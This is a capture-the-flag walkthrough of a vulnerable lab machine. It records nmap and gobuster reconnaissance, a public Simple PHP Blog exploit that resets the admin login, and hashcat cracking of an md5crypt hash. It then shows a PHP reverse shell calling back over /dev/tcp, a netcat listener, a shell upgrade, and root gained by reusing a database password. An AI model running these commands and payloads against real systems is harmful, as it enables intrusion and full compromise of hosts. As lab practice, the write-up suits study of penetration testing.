nmap -Pn -T4 10.10.10.1/24
Starting Nmap 7.70SVN ( https://nmap.org ) at 2019-06-04 15:24 ADT
Nmap scan report for 10.10.10.100
Host is up (0.00044s latency).
Not shown: 998 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 94:65:9C:41:A0:D7 (Intel Corporate)
Starting gobuster:
gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.100 > /root/boxes
/pwnos/reco.txt
2019/06/04 15:29:28 Starting gobuster
2019/06/04 15:30:30 Finished
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.10.100/
[+] Threads : 10
[+] Wordlist : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
=====================================================
/index (Status: 200)
/login (Status: 200)
/register (Status: 200)
/info (Status: 200)
/blog (Status: 301)
/includes (Status: 301)
/activate (Status: 302)
/server-status (Status: 403)
=====================================================
So going to the website:
Then Register:
Activate account:
And login:
Then nothing happens!
Not much for now.
Checking the blog directory:
In the source I see
<meta name=”generator” content=”Simple PHP Blog 0.4.0″ />
Searching for exploit:
Simple PHP Blog 0.4 – ‘colors.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26463.txt
Simple PHP Blog 0.4 – ‘preview_cgi.php’ Multiple Cross-Site Scripting Vulnerabilities | exploits/cgi/webapps/26461.txt
Simple PHP Blog 0.4 – ‘preview_static_cgi.php’ Multiple Cross-Site Scripting Vulnerabiliti | exploits/cgi/webapps/26462.txt
Simple PHP Blog 0.4.0 – Multiple Remote s | exploits/php/webapps/1191.pl
Simple PHP Blog 0.4.0 – Remote Command Execution (Metasploit) | exploits/php/webapps/16883.rb
Simple PHP Blog 0.4.7.1 – Remote Command Execution | exploits/php/webapps/1581.pl
The exploit 1191.pl is interesting. I can shows login/password hash:
I found $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
Trying to identify the format:
/usr/share/exploitdb# hashid ‘$1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
‘
Analyzing ‘$1$weWj5iAZ$NU4CkeZ9jNtcP/qrPC69a/’
[+] MD5 Crypt
[+] Cisco-IOS(MD5)
[+] FreeBSD MD5
Then using hashcat:
hashcat -m 500 –force -a 0 -o craked hash /usr/share/wordlists/rockyou.txt
Session……….: hashcat
Status………..: Cracked
Hash.Type……..: md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)
Hash.Target……: $1$5uKltrG3$Q59M4eQKIqLC7JBA4rLHK/
Time.Started…..: Wed Jun 5 12:50:27 2019 (26 secs)
Time.Estimated…: Wed Jun 5 12:50:53 2019 (0 secs)
Guess.Base…….: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue……: 1/1 (100.00%)
Speed.#1………: 4376 H/s (8.03ms) @ Accel:128 Loops:62 Thr:1 Vec:8
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 112640/14344385 (0.79%)
Rejected………: 0/112640 (0.00%)
Restore.Point….: 112128/14344385 (0.78%)
Restore.Sub.#1…: Salt:0 Amplifier:0-1 Iteration:992-1000
Candidates.#1….: ethan11 -> chambers1
In the meantime trying soomething else:
perl 1191.pl -h http://10.10.10.100/blog -e 3 -U erik -P erik
________________________________________________________________________________
SimplePHPBlog v0.4.0 Exploits
by
Kenneth F. Belva, CISSP
http://www.ftusecurity.com
________________________________________________________________________________
Running Set New Username and Password Exploit….
Deleted File: ./config/password.txt
./config/password.txt created!
Username is set to: erik
Password is set to: erik
I’m in!
Sent to upload an image and uploaded the following php:
<?php exec(“/bin/bash -c ‘bash -i >& /dev/tcp/10.10.10.10/443 0>&1′”);?>
It worked!
Then on kali:
nc -lnvp 443
Then on the broswer, I went to http://10.10.10.100/blog/images/reverse.php
Bingo!
nc -lnvp 443
listening on [any] 443 …
connect to [10.10.10.10] from (UNKNOWN) [10.10.10.100] 36116
bash: no job control in this shell
www-data@web:/var/www/blog/images$
Upgrade to a proper shell:
python -c 'import pty; pty.spawn("/bin/bash")'
CTRL Z
stty raw -echo
fg and two times ENTER
export TERM=screen
reset
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Now trying to escalate:
uname -a
Linux web 2.6.38-8-server #42-Ubuntu SMP Mon Apr 11 03:49:04 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
Nothing in sudoers et suid
Tried different exploits.. nothing
Checking mysql as the password is in mysqli_connect.php
// Set the database access information as constants:
DEFINE (‘DB_USER’, ‘root’);
DEFINE (‘DB_PASSWORD’, ‘root@ISIntS’);
DEFINE (‘DB_HOST’, ‘localhost’);
DEFINE (‘DB_NAME’, ‘ch16’);
mysql -u root -p
Then select do_system(‘id > tmp/out; chown www-data.www-data /tmp/out’);
Didn’t work…. Missing UDF..
Tried to login as root using the same password:
BINGO!
/home$ su –
Password:
root@web:~# id
uid=0(root) gid=0(root) groups=0(root)
root@web:~# cd /root
root@web:~# ll
total 32
drwx—— 4 root root 4096 2011-05-09 19:25 ./
drwxr-xr-x 21 root root 4096 2011-05-07 13:37 ../
drwx—— 2 root root 4096 2011-05-07 15:12 .aptitude/
-rw-r–r– 1 root root 107 2011-05-09 19:29 .bash_history
-rw-r–r– 1 root root 3106 2010-10-21 08:47 .bashrc
drwx—— 2 root root 4096 2011-05-07 17:18 .cache/
-rw-r–r– 1 root root 0 2011-05-09 19:24 .mysql_history
-rw-r–r– 1 root root 140 2010-10-21 08:47 .profile
-rw——- 1 root root 837 2011-05-09 19:16 .viminfo